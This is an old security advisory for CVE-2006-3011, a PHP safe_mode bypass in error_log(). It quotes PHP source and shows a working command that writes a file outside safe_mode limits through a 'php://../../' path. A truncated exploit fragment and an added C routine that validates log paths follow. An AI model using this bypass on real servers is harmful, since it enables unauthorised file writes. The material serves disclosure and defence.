
error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2



[error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
-Written: 10.6.2006
-Public: 26.06.2006
from SECURITYREASON.COM
CVE-2006-3011

--- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.
error_log -- Send an error message somewhere.

--- 1. error_log() Safe Mode Bypass ---
The error_log() function sends your error message by email, writes it to a file, or displays it. The issue is very simple. error_log() checks safe_mode and open_basedir in the stream function, but using a URL is not allowed there, and the problem lies in an incorrect filename.

PHP5:
-2013-2050---
PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char *headers TSRMLS_DC)
{
	php_stream *stream = NULL;

	switch (opt_err) {

		case 1:		/*send an email */
			{
#if HAVE_SENDMAIL
				if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) {
					return FAILURE;
				}
#else
				php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!");
				return FAILURE;
#endif
			}
			break;

		case 2:		/*send to an address */
			php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!");
			return FAILURE;
			break;

		case 3:		/*save to a file */
			stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
			if (!stream)
				return FAILURE;
			php_stream_write(stream, message, strlen(message));
			php_stream_close(stream);
			break;

		default:
			php_log_err(message TSRMLS_CC);
			break;
	}
	return SUCCESS;
}
-2013-2050---

Let's look at option 3.

-2038 line---
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
-2038 line---

Mode "a" writes the error to the file or, if the file doesn't exist, creates a new file.
The problem is that "IGNORE_URL" is set in the php_stream_open_wrapper() call.
IGNORE_URL turns off safe_mode if you use "prefix://../../".

-Example---
cxib# php -r 'error_log("", 3, "/www/temp/sr.php");'

Warning: error_log(): SAFE MODE Restriction in effect.  The script whose uid is 0 is not allowed to access /www/temp owned by uid 80 in Command line code on line 1

Warning: error_log(/www/temp/sr.php): failed to open stream: Invalid argument in Command line code on line 1
cxib# php -r 'error_log("", 3, "php://../../www/temp/sr.php");'
cxib# ls -la /www/temp/sr.php
-rw-r--r--  1 cxib  www  16 Jun 11 17:47 /www/temp/sr.php
cxib# 
-Example---

--- 2. Exploit ---
", 3, "php://../../".$file);
?>


--- 3. How to fix ---
No response from the PHP Team. We reported this bug on 11.06.2006.
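
As an added illustration (not code from the advisory or from PHP), here is one way an application could vet a file destination before handing it to a file logger such as error_log() with option 3, refusing the "prefix://../../" form shown in the example above. The function names and the sample base directory in the comments are assumptions made for this example.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Length of a leading "scheme://" marker in dest, or 0 for a plain path.
 * Hypothetical helper for this example, not a PHP API. */
size_t scheme_prefix_len(const char *dest)
{
	const char *p = dest;

	if (!isalpha((unsigned char)*p))
		return 0;
	while (isalnum((unsigned char)*p) || *p == '+' || *p == '-' || *p == '.')
		p++;
	return (p[0] == ':' && p[1] == '/' && p[2] == '/')
		? (size_t)(p - dest) + 3 : 0;
}

/* 1 if the path contains a ".." component, else 0. */
int has_dotdot_component(const char *path)
{
	const char *p = path;

	while (*p) {
		size_t n = strcspn(p, "/");	/* length of this component */
		if (n == 2 && p[0] == '.' && p[1] == '.')
			return 1;
		p += n;
		while (*p == '/')
			p++;
	}
	return 0;
}

/* Policy gate (hypothetical): allow a file log destination only when it is
 * an absolute plain path, has no ".." component, and lies under base.
 * base is assumed absolute, without a trailing slash, e.g. "/www/logs". */
int log_dest_allowed(const char *dest, const char *base)
{
	size_t blen = strlen(base);

	if (scheme_prefix_len(dest) != 0)	/* e.g. "php://../../www/temp/sr.php" */
		return 0;
	if (dest[0] != '/' || has_dotdot_component(dest))
		return 0;
	/* Prefix match must end on a component boundary: "/www/logs2" is outside. */
	return strncmp(dest, base, blen) == 0 && dest[blen] == '/';
}
```

The check is purely lexical and does not resolve symbolic links.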

--- 4. Greets ---

For: sp3x
and
p_e_a, l3x, pi3, eax, Infospec, gKPc8O3

--- 5. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com